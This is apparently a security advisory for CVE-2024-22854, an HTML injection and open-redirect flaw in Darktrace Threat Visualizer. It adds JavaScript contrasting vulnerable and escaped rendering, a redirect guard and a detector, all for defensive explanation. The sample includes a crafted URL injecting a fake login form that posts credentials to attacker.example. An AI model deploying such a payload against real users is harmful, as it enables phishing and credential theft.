PT-2024-19586 · Darktrace · Darktrace Threat Visualizer

Published

2024-02-16

·

Updated

2025-01-13

·

CVE-2024-22854

CVSS v3.1

6.1

Medium

Vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions Darktrace Threat Visualizer versions 6.1.27 and before
Description A DOM-based HTML injection vulnerability has been identified in the main page of Darktrace Threat Visualizer. A remote, unauthenticated attacker can craft a URL that, when opened by an authenticated user, injects attacker-controlled HTML into the page in the user's browser. This can be used to redirect the user to an attacker-chosen site (open redirect) or to render an injected HTML form that captures the user's credentials.
Recommendations For Darktrace Threat Visualizer versions 6.1.27 and earlier, consider disabling access to the main page until a patch is available, to prevent potential credential stealing. Restrict access to the vulnerable component to minimize the risk of exploitation, and avoid using the vulnerable version until the issue is resolved. Because exploitation requires an authenticated user to open a crafted link (UI:R in the CVSS vector), treat unexpected links to the Threat Visualizer main page with suspicion. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
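As an added illustration (not Darktrace's code, and not the actual injection point in Threat Visualizer, which this advisory does not disclose), the following shows the generic DOM-based HTML injection pattern the description refers to beside its hardened form, an open-redirect guard, and a small triage helper that flags injected forms whose action points off-origin. The query parameter names msg and next, the origin threat-visualizer.example, and the sample payload are assumptions constructed for the example; the render functions return the HTML string a page would otherwise assign to element.innerHTML, so the example runs under Node without a browser DOM.

```javascript
// Added example of the vulnerability class, not product code.
// Assumptions: parameter names "msg" and "next", origin "threat-visualizer.example".

// Vulnerable pattern: URL-controlled data is concatenated straight into markup.
// In a browser this is the classic `el.innerHTML = location.search-derived value`.
function renderVulnerable(pageUrl) {
  const u = new URL(pageUrl);
  const msg = u.searchParams.get("msg") || "";
  return `<div id="banner">${msg}</div>`; // raw HTML injection
}

// Hardened pattern: escape before concatenation (or use textContent in a browser).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(pageUrl) {
  const u = new URL(pageUrl);
  const msg = u.searchParams.get("msg") || "";
  return `<div id="banner">${escapeHtml(msg)}</div>`;
}

// Open-redirect guard: only follow a "next" target that resolves to our own origin.
// Resolving against u.origin also catches protocol-relative "//attacker.example/".
function safeRedirectTarget(pageUrl) {
  const u = new URL(pageUrl);
  const next = u.searchParams.get("next") || "/";
  let target;
  try {
    target = new URL(next, u.origin);
  } catch {
    return u.origin + "/";
  }
  return target.origin === u.origin ? target.href : u.origin + "/";
}

// Triage helper: list <form> actions in rendered markup that post to another origin.
// A fake login form posting off-origin is what "credential stealing using an
// injected HTML form" looks like in practice.
function findOffOriginForms(html, origin) {
  const out = [];
  const re = /<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    try {
      const target = new URL(m[1], origin);
      if (target.origin !== origin) out.push(target.href);
    } catch {
      // unparsable action attribute: ignore
    }
  }
  return out;
}

// Constructed sample: a crafted URL carrying a fake "session expired" login form.
const ORIGIN = "https://threat-visualizer.example";
const PAYLOAD =
  '<form action="https://attacker.example/collect" method="POST">' +
  'Session expired <input name="user"><input name="pass" type="password">' +
  '<input type="submit"></form>';
const CRAFTED_URL = `${ORIGIN}/?msg=${encodeURIComponent(PAYLOAD)}`;

console.log("vulnerable:", findOffOriginForms(renderVulnerable(CRAFTED_URL), ORIGIN));
console.log("hardened:  ", findOffOriginForms(renderHardened(CRAFTED_URL), ORIGIN));
console.log("redirect:  ", safeRedirectTarget(`${ORIGIN}/?next=//attacker.example/`));
```

The vulnerable render emits the attacker's form verbatim, so the triage helper reports the off-origin action; the hardened render turns `<form` into `&lt;form` and nothing is reported. The redirect guard shows the companion fix for the open-redirect outcome: any next target that does not resolve to the application's own origin falls back to the site root.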

Exploit

Open Redirect

XSS

Weakness Enumeration

Related Identifiers

CVE-2024-22854

Affected Products

Darktrace Threat Visualizer